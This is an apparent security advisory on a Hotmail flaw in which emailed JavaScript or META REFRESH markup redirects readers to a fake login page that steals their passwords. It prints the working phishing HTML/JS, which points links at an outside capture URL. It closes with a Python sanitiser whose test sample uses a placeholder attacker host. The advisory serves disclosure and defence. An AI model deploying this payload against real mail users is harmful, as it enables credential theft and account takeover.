COMMAND
Hotmail
SYSTEMS AFFECTED
Users having inbox on www.hotmail.com
PROBLEM
Tom Cervenka found a serious security hole in Microsoft's Hotmail
service that allows malicious users to easily steal the passwords
of Hotmail users. The exploit involves sending an e-mail message
that contains embedded JavaScript code. When a Hotmail user views
the message, the JavaScript code forces the user to re-login to
Hotmail. In doing so, the victim's username and password are sent
to the malicious user by e-mail. See the demo at:
http://www.because-we-can.com/hotmail/default.htm
Once a malicious user knows the password to the victim's Hotmail
account, he can assume full control of the account, including the
ability to:
- delete, send, and read the victim's e-mail
- check mail on other mail servers that the victim has
configured for mail-checking
- access the victim's address book
- discover other passwords sent as confirmation of
registration in old e-mails
- change the password of the Hotmail account
The security problem is dangerously easy to take advantage of. A
would-be hacker needs only to embed the JavaScript code into the
body of an e-mail message using a standard e-mail program such as
Netscape Mail (free). The working demonstration and full
description of this exploit at the URL above show that even users
without their own Internet service provider (ISP) can steal an
arbitrary number of Hotmail passwords by using a free Geocities
account. The "Hot"mail exploit is a serious security concern for
the following reasons:
1. The malicious code runs as soon as the e-mail message is viewed.
2. The resources required to launch the attack are minimal and
freely available.
3. The malicious e-mail can be sent from virtually anywhere,
including libraries, Internet cafes, or classroom terminals.
4. The exploit works with any JavaScript-enabled browser,
including Microsoft Internet Explorer and Netscape Communicator.
This is a variation on the Spartan Horse announced by Dan Gregorie
over a week ago and covered on news.com on the 14th. The Spartan
Horse is available for viewing at:
http://www.thetopoftheworld.com
The news.com article is at:
http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d
The difference is that the Spartan Horse, as designed on the
www.thetopoftheworld.com site, mimics the Windows 95/98
Dial-Up Networking dialog box.
Jonathan James studied Mr. Cervenka's findings and then started to
experiment. There is a way to do this to a browser that has
JavaScript disabled: put a META REFRESH tag into the HTML file,
with its URL pointing at the page that does the actual capturing
and sending of the login/password. This is shown in the example
below. It has been tested on IE 4.0 and later and Netscape 3.0
and later. The code below is what gets inserted into the mail that
is sent to the victim.
<html>
<head>
<!-- fallback for browsers with JavaScript disabled: after one second,
     META REFRESH loads the page that captures the login -->
<meta http-equiv="refresh" content="1; url=http://www.because-we-can.com/hotmail/default.htm">
</head>
<body>
<P>Hotmail flaw. (second version)
<script>
errurl="http://www.because-we-can.com/hotmail/default.htm";
// point every link in Hotmail's menu frame at the capture page,
// opening it in the "work" frame so the surrounding Hotmail UI stays visible
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href=errurl;
}
// same treatment for the links in the work (message) frame
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href=errurl;
}
</script>
</body>
</html>
A web page has also been set up that supplies the code:
http://home7.swipnet.se/~w-78566/hotmail/
SOLUTION
Both Microsoft and Hotmail have been notified that a security
problem exists. The following information about the "Hot"Mail
exploit is being made publicly available to speed the process of
fixing the security hole and to inform users how they can protect
themselves. It appears that Hotmail fixed this by rewriting
<script> tags as <comment> (s/<script>/<comment>/ or some
variation) when a message is viewed.
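As an added example (not code from the advisory, from Hotmail, or from the researchers it cites), the Python below contrasts the s/<script>/<comment>/ patch described above with an allowlist sanitiser, run over a constructed message in the shape of the META REFRESH variant Jonathan James describes; the attacker.invalid host and all function names are assumptions.

```python
import re
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "b", "i", "br", "a", "ul", "li"}   # everything else is dropped
ALLOWED_ATTRS = {"a": {"href"}}                          # no on*= handlers, no style
SAFE_URL = re.compile(r"^(https?:|mailto:)", re.I)       # rejects javascript: URLs

def naive_hotmail_fix(html: str) -> str:
    """The patch the advisory credits to Hotmail: rename <script> to <comment>."""
    return re.sub(r"<(/?)script>", r"<\1comment>", html, flags=re.I)

class MailSanitizer(HTMLParser):
    """Rebuild the message from an allowlist instead of blacklisting one tag."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0   # skip > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1            # the block's text is dropped in handle_data
        elif tag in ALLOWED_TAGS:     # anything else (<meta>, <iframe>, <form>...) is dropped
            kept = ""
            for name, value in attrs:
                if name in ALLOWED_ATTRS.get(tag, ()) and value and SAFE_URL.match(value.strip()):
                    kept += f' {name}="{escape(value)}"'
            self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))

def sanitize_mail_html(html: str) -> str:
    p = MailSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)

# Constructed sample in the advisory's shape (META REFRESH plus a script block);
# attacker.invalid is a placeholder host, not the URL from the advisory.
SAMPLE = ('<html><head><meta http-equiv="refresh" content="1; url=http://attacker.invalid/"></head>'
          '<body><p>Hotmail flaw.</p><script>top.work.location="http://attacker.invalid/";</script>'
          '<a href="javascript:top.work.location=\'http://attacker.invalid/\'">Inbox</a></body></html>')
```

Running naive_hotmail_fix(SAMPLE) leaves the META REFRESH and the javascript: link untouched, which is exactly the bypass described above; sanitize_mail_html(SAMPLE) returns only the paragraph and a stripped <a>Inbox</a>.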